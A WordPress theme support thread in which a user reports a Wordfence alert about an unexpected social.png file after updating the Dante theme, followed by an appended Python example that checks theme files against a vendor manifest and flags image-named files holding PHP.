Wordfence Security Scan After Update "This file appears to be malicious"
This topic has 9 replies, 4 voices, and was last updated 10 years ago by Swift Ideas – Ed.
Posted in: Dante
August 10, 2014 at 10:36 am #99664
Hi, I have just upgraded to the latest version of Dante, and after a security scan by my Wordfence plugin I am getting this “Critical” warning that the theme has malicious code.
I tried uploading the theme onto another test site and updated to the latest version, and I am getting the same warning message.
Do you have any idea what could be the issue?
Kind regards
Gary
This file appears to be malicious
Filename: wp-content/themes/dante/social.png
File type: Not a core, theme or plugin file.
Issue first detected: 12 mins ago.
Severity: Critical
Status New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is:
August 11, 2014 at 8:59 am #99761
Hi
There’s no social.png in my Dante folder, you can delete that file
– Kyle
August 11, 2014 at 9:01 am #99762
Hi,
Please delete the current file and contact your hosting provider to secure your website.
Thanks
With Best Regards
Mohammad
August 11, 2014 at 9:24 am #99779
Ok Mohammad
Thank you for that. I have deleted the file & rescanned and all ok
I just thought I should let you know as the issue only showed up when I upgraded to the latest version of Dante Theme
I tested it on some other test sites that I have and exactly the same thing happened when I upgraded and re scanned
So I just thought it might be an issue with the Dante update?
All seems ok now
Thank you
Gary
August 11, 2014 at 9:28 am #99782
Hi,
Thanks for this information, and I will inform the developer of the theme.
With Best Regards
Mohammad
August 11, 2014 at 9:28 am #99783
OK Thank you again for your help
August 11, 2014 at 9:34 am #99786
You're most welcome.
Thanks
With Best Regards
Mohammad
August 11, 2014 at 4:40 pm #100032
@garymogford – thanks for letting us know, where did you get this update from?
– Ed
August 11, 2014 at 6:16 pm #100051
Hi Ed
It came up in my wp dashboard that the theme was out of date so I clicked on update and everything seemed fine.
But then I got an email from my Wordfence Security plug in saying there was malicious code in the dante theme files (as attached in original email)
So I tested it again on my test site and it did the same thing.
So I thought it best to let you know as I assume the update I did came direct from you?
I have deleted the file & rescanned it and all seems ok now but not sure how it got into your update.
Kind regards
Gary
August 11, 2014 at 9:34 pm #100082
Hi Gary,
I’ve checked and can’t see this in the update – but will investigate further. There is no file such as this in the current available files.
Thanks,
– Ed
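Added example, not part of the original thread and not Wordfence or theme code: one way to repeat the two checks the thread relies on, namely whether a file in the theme directory is in the vendor's package at all, and whether a file named like an image really is one (social.png here was neither). The function names, the manifest set and the sample files are assumptions constructed for illustration; the manifest would normally be built from the file list of the theme zip downloaded from the vendor.

```python
import os
import re
import tempfile

# Leading magic bytes for the image types a theme normally ships.
IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def audit_theme(theme_dir, manifest):
    """Return sorted (rel_path, reason) findings; manifest = vendor package paths."""
    findings = []
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, theme_dir).replace(os.sep, "/")
            if rel not in manifest:
                findings.append((rel, "not in vendor package"))
            magic = IMAGE_MAGIC.get(os.path.splitext(name)[1].lower())
            if magic is None:
                continue  # only image-named files get the content checks
            with open(path, "rb") as fh:
                data = fh.read()
            if not data.startswith(magic):
                findings.append((rel, "image extension, wrong magic bytes"))
            if PHP_TAG.search(data):
                findings.append((rel, "image extension, contains PHP tag"))
    return sorted(findings)


def demo():
    """Audit a constructed theme tree (all sample files are made up here)."""
    samples = {
        "style.css": b"/* Theme Name: Example */",
        "images/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        # Harmless stand-in for the flagged file: PHP text under a .png name.
        "social.png": b"<?php /* placeholder, not real malware */ ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            full = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(body)
        return audit_theme(tmp, {"style.css", "images/logo.png"})
```

A file that reappears after deletion and a fresh update, as reported on the test sites above, points to something on the server writing it back, so the same audit is worth running across the other themes and plugins on that host.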